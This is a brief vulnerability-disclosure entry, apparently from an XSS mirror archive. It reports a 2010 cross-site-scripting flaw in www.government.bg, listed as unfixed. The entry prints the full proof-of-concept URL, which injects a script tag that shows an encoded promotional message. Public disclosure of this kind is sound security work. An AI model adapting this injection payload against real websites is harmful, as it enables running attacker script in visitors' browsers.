Security researcher CyberGhost Security, has submitted on 30/04/2010 a cross-site-scripting (XSS) vulnerability affecting www.government.bg, which at the time of submission ranked 38390 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 17/05/2010. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 30/04/2010 |
Date published: 17/05/2010 |
Fixed? Mail us! | Status: UNFIXED |
URL: http://www.government.bg/cgi-bin/e-cms/vis/vis.pl?s=001&p=1--%3E%3Cscript%20%0D%0A%3Ealert%28String. fromCharCode%2867,%20121,%2098,%20101,%20114,%2071,%20104,%20111,%20115,%20116,%2032,%2083,%20101,%2 099,%20117,%20114,%20105,%20116,%20121,%2032,%2045,%2032,%2080,%20114,%20111,%20102,%20101,%20115,%2 0115,%20105,%20111,%20110,%2097,%20108,%2032,%2080,%20101,%20110,%20101,%20116,%20114,%2097,%20116,% 20105,%20111,%20110,%2032,%2084,%20101,%20115,%20116,%20105,%20110,%20103,%2032,%2083,%20101,%20114, %20118,%20105,%2099,%20101,%20115%29%29%3B%3C/script%3E |
Click here to view the mirror
|
|